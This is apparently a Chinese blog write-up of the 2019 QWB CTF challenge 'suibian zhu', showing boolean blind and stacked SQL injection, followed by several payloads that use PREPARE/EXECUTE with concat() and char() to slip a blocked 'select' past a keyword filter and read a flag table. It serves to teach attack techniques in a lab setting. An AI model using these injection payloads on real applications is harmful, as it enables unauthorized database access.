[强网杯 2019]随便注

最新推荐文章于 2024-06-08 11:59:32 发布
最新推荐文章于 2024-06-08 11:59:32 发布
阅读量2k 收藏
点赞数
分类专栏: BUUOJ---WEB 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AiNi5zu/article/details/120684714
版权
本文探讨了如何利用SQLmap进行堆叠注入和预处理语句技巧,包括字符转义、payload构造,如使用';show databases;'获取数据库列表,以及通过concat和char函数绕过过滤。重点介绍了利用变量和预定义SQL语句来执行复杂查询的方法。
摘要由CSDN通过智能技术生成

看到了sqlmap没有灵魂盲猜是sql注入

布尔盲注(不太会

length(database()) 判断数据库名长度

得到了长度为9

ascii(substr(database(),1,1)) = 115 --+

得到第一位 s

第二位 u

第三位 p

第四位 e

第五位 r

第六位 s

第七位 q

第八位 l

第九位 I

Supersqli

方法错误!!!

堆叠注入

Payload : ';show databases;#

显示所有数据库

不能使用select

word表

查看表的结构

数字用反引号选中 发现flag 可知flag在1919810931114514表中

方法2 学习大佬的思路

预处理语句+堆叠注入

1

2

3

PREPARE name from '[my sql sequece]';   //预定义SQL语句

EXECUTE name;  //执行预定义SQL语句

(DEALLOCATE || DROP) PREPARE name;  //删除预定义SQL        语句

预定义语句也可以通过变量进行传递:

1

2

3

4

5

SET @tn = 'hahaha';  //存储表名

SET @sql = concat('select * from ', @tn);  //存储SQL语句

PREPARE name from @sql;   //预定义SQL语句

EXECUTE name;  //执行预定义SQL语句

(DEALLOCATE || DROP) PREPARE sqla;  //删除预定义SQL语句

本题即可利用 char() 函数将select的ASCII码转换为select字符串,接着利用concat()函数进行拼接得到select查询语句,从而绕过过滤。或者直接用concat()函数拼接select来绕过。

char(115,101,108,101,99,116)<----->'select'

payload1:不使用变量

1';PREPARE hacker from concat(char(115,101,108,101,99,116), '* from`1919810931114514` ');EXECUTE hacker;#

payload2:使用变量

1';SET @sqli=concat(char(115,101,108,101,99,116),'* from`1919810931114514`');PREPARE hacker from @sqli;EXECUTE hacker;#

payload3:只是用contact(),不使用char()

1

1';PREPARE hacker from concat('s','elect', ' * from `1919810931114514` ');EXECUTE hacker;#

来自 <[强网杯 2019]随便注 1 - ZM思 - 博客园>

QAdmire_
关注
专栏目录
BMZCTF 强网杯 2019 随便
qq_26243045的博客
11-29 425
考点:sql入、二次入 打开网页,是一个输入框: 输入1,并提交: 看到返回数组,测试是否存在入点:输入1‘ 返回报错。 输入1‘ # 返回正常 尝试手工入: 1、输入1‘ order by *,测试能返回几列,多次尝试,*处为2,即:1’ order by 2能返回正常。 再试着输入select测试返回点:1’ union select 1,2 # 看到好多字符被过滤。尝试sqlmap 只能爆出库名为supersqli 尝试堆叠入 输入:1’; s
SQL Injection8(堆叠入)——强网杯2019随便
热门推荐
kid的博客
05-28 1万+
SQL Injection8(堆叠入)——强网杯2019随便 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便是一道sql入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠入的知识,堆叠入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠入原理 在SQL中,...
强网杯2019随便!!sqllibs 第11和12关 postsqlmap直接嗦??堆叠入来看看!!!!
最新发布
helloKittywz的博客
06-08 827
看到了数据库我们在看表,还是一样的加参数 -tables。前面都是get型的入,我们现在来看看post的sql入。我在经过简单的尝试过后,也成功的登录了,看看我下面的。sqlamp中加上参数-r “路径”来进行入。的,看能不能来进行登录,这点就需要我们来进行。post的sql入的话,我们在看见了。,这点跟get入不一样。相结合来进行操作,然后把。放到一个记事本中,然后在。post的话我们要跟。
强网杯 2019]随便
qq_53689523的博客
02-17 179
强网杯2019随便;堆叠入,禁select;sql入,sqlmap
BUUCTF——[强网杯 2019]随便 1
小白一枚多多关注的博客
03-17 426
这道题是强网杯的题,如果各位之前做过攻防世界有可能就知道强网杯代表着什么,代表着题很难,鹅鹅鹅,好了我们开始进入环境 进入环境后只看见了一段文字和一个文本框以及提交按钮,当然在这里我们还不能猜测出是用什么方式进行攻击,老规矩查看一下源代码看看有没有什么有价值的信息 可以看见源代码中说了一句sqlmap是没有灵魂的,那么就此可以判断出这道题应该是sql入并且sqlmap是做不出来的,所以必须得是手工入,那么手工入就需要判断入点在哪里,接下来就是图文解释了,太长了难的打字了 因为禁用了s
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
[强网杯 2019]随便.docx
12-18
强网杯 2019】SQL 入详解 SQL 入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 入题目。首先,通过尝试...
[强网杯 2019]随便 1
Huamang的博客
02-01 840
判断入点 万能密码先一搞 没啥用但是有回显 查询字段数 使用order by来操作 从1试到3,发现3有错误提示,说明有两个字段 在表中随便输入一个查询语句发现很多的语句被过滤 看wp准备使用堆叠入 堆叠入 直接看表 再看每个表的定义 第一个表就出现flag四个字 1' ; desc `1919810931114514`;# (意数字加引号,数字串为表名的表操作时要加反引号) 1' ;desc words;# 第一个数字表里面明显有我想要的flag,但是select语句被屏蔽掉了,不
强网杯 2019]随便 【SQL入】四种解法
weixin_38832257的博客
08-17 1817
题目简介 题目名称:[强网杯 2019]随便 1 题目平台:BUUCTF 题目类型:Web 考察知识点: SQL入 解题步骤 方法一: 首先启动并访问靶机,有一个输入框,随便输入1' or 1 = 1,测试一下是否存在sql入。 提交后提示error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the
BUUCTF Web [强网杯 2019]随便
wangyuxiang946的博客
10-25 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [强网杯 2019]随便一、题目简介二、思路分析1)判断入点2)选择入方式3)查看表中内容三、解题步骤1)获取表2)获取字段3)获取表中数据四、总结 一、题目简介 进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。 在输入框中输入一个2,即可.
强网杯2019 随便
BlueDoorZz的博客
07-11 449
没什么好说的,教程一搜一大堆。 这题过滤了select,updata,where等关键字,不能使用常规的方法进行入,可以考虑堆叠入。 查表名:1';show tables;# 查列名:1';show cloumns from XXXX;# 查看flag有两种方式: 一 1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `fla
buuoj强网杯2019随便
qq_43619533的博客
12-07 1723
buuoj强网杯2019随便 打开环境: 查看源码: 说明sqlmap行不通。 返回页面 依次输入: 1 1' 1' # 1’ order by 2 # 发现可以正常显示,入题,并且爆出了字段数。 输入select return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 过滤掉了这些...
[强网杯 2019]随便1
kindyyy的博客
09-05 273
这里的意思大概是:这个默认查询word表的内容,没有办法看flag所在的表的字段,所以要将word所在的表名改为word,将word改为其他的表,即可默认查询flag。原理很简单,mysql_multi_query() 支持多条Sql语句同时执行,就是个;分隔,成堆的执行sql语句。在这里我学到了一个新的入方法,堆叠入,顾名思义,就是将语句堆叠在一起进行查询。其实直觉就觉得大概在1919810931114514里面有,让我们打开看一下。新知识:堆叠入遇到有数字时要用那个反引号包裹起来。
[CTF-writeup] BUUCTF:强网杯2019_随便
.
11-26 1000
相对于比较简单的SQL入而言,这道题在步骤上确实显得有些曲折了,因为过滤机制给我们带来了一些麻烦。但总体而言,找入点、判断闭合方式、爆破表、爆破字段的思路还是比较清晰的。笔者在这道题中的做法——对已知表的结构进行修改,也可以提供一种灵活的思路。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值